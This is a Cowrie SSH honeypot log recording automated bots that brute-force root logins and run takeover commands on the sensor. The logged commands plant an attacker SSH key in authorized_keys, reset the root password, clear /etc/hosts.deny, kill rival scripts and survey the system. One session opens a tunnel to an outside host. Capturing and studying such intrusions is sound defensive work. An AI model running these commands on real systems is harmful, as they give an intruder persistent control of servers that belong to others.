{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:23.147520Z","src_ip":"212.227.125.160","session":"969d45d950c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":25717,"dst_ip":"1.2.3.4","dst_port":22,"session":"c90d02065f56","protocol":"ssh","message":"New connection: 212.227.125.160:25717 (1.2.3.4:22) [session: c90d02065f56]","sensor":"my-vps","timestamp":"2025-08-26T13:17:23.263081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:17:23.264003Z","src_ip":"212.227.125.160","session":"c90d02065f56"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T13:17:23.381036Z","src_ip":"212.227.125.160","session":"c90d02065f56"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:17:23.735556Z","src_ip":"212.227.125.160","session":"c90d02065f56"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T13:17:23.853570Z","session":"c90d02065f56"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:24.545942Z","src_ip":"212.227.125.160","session":"3d1c7a64dff3"}
{"eventid":"cowrie.session.closed","duration":180.15591073036194,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:24.551030Z","src_ip":"212.227.125.160","session":"3d1c7a64dff3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52282,"dst_ip":"1.2.3.4","dst_port":22,"session":"d66ba214fde8","protocol":"ssh","message":"New connection: 212.227.235.229:52282 (1.2.3.4:22) [session: d66ba214fde8]","sensor":"my-vps","timestamp":"2025-08-26T13:17:27.294999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:17:27.295807Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:17:27.546651Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.login.success","username":"root","password":"Fh123456","message":"login attempt [root/Fh123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:17:28.591114Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:29.112740Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:17:29.113616Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:17:29.114430Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:29.366652Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:29.989012Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:17:29.989849Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:17:30.243481Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:30.244500Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52296,"dst_ip":"1.2.3.4","dst_port":22,"session":"358d0348ddfd","protocol":"ssh","message":"New connection: 212.227.235.229:52296 (1.2.3.4:22) [session: 358d0348ddfd]","sensor":"my-vps","timestamp":"2025-08-26T13:17:30.507323Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:17:30.508277Z","src_ip":"212.227.235.229","session":"358d0348ddfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45074,"dst_ip":"1.2.3.4","dst_port":22,"session":"49eecc5f9883","protocol":"ssh","message":"New connection: 212.227.235.229:45074 (1.2.3.4:22) [session: 49eecc5f9883]","sensor":"my-vps","timestamp":"2025-08-26T13:17:32.016831Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52662,"dst_ip":"1.2.3.4","dst_port":22,"session":"2445293ec118","protocol":"ssh","message":"New connection: 212.227.235.229:52662 (1.2.3.4:22) [session: 2445293ec118]","sensor":"my-vps","timestamp":"2025-08-26T13:17:36.507195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:17:36.508125Z","src_ip":"212.227.235.229","session":"2445293ec118"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:17:36.514341Z","src_ip":"212.227.235.229","session":"358d0348ddfd"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:36.515923Z","src_ip":"212.227.235.229","session":"358d0348ddfd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:42.584044Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T13:17:42.584974Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:17:42.587451Z","src_ip":"212.227.235.229","session":"2445293ec118"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:42.589543Z","src_ip":"212.227.235.229","session":"2445293ec118"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:42.838429Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.connect","src_ip":"113.141.82.238","src_port":60014,"dst_ip":"1.2.3.4","dst_port":22,"session":"6de5ec89cb8f","protocol":"ssh","message":"New connection: 113.141.82.238:60014 (1.2.3.4:22) [session: 6de5ec89cb8f]","sensor":"my-vps","timestamp":"2025-08-26T13:17:43.045491Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:17:43.046519Z","src_ip":"113.141.82.238","session":"6de5ec89cb8f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:17:43.277118Z","src_ip":"113.141.82.238","session":"6de5ec89cb8f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:43.368403Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"echo \"root:mFgUTwtxiBnA\"|chpasswd|bash","message":"CMD: echo \"root:mFgUTwtxiBnA\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T13:17:43.369489Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/27857142aa80cbf56505509d8d6dacf4527b2d90e136f3801069d2ee8b432bd8","size":21,"shasum":"27857142aa80cbf56505509d8d6dacf4527b2d90e136f3801069d2ee8b432bd8","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/27857142aa80cbf56505509d8d6dacf4527b2d90e136f3801069d2ee8b432bd8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:43.623150Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:44.186451Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T13:17:44.187277Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.login.failed","username":"pankaj","password":"pankaj@123","message":"login attempt [pankaj/pankaj@123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:17:44.239570Z","src_ip":"113.141.82.238","session":"6de5ec89cb8f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T13:17:44.443540Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:44.444556Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:45.020532Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T13:17:45.021549Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:45.274268Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:45.471944Z","src_ip":"113.141.82.238","session":"6de5ec89cb8f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:45.796044Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T13:17:45.796716Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":30,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:46.049704Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:46.674901Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T13:17:46.675698Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T13:17:46.676213Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:46.929514Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:47.452052Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T13:17:47.452897Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:47.705033Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:48.313711Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T13:17:48.314467Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":204,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:17:48.567068Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:17:49.138731Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T13:17:49.139493Z","src_ip":"212.227.235.229","session":"d66ba214fde8"}
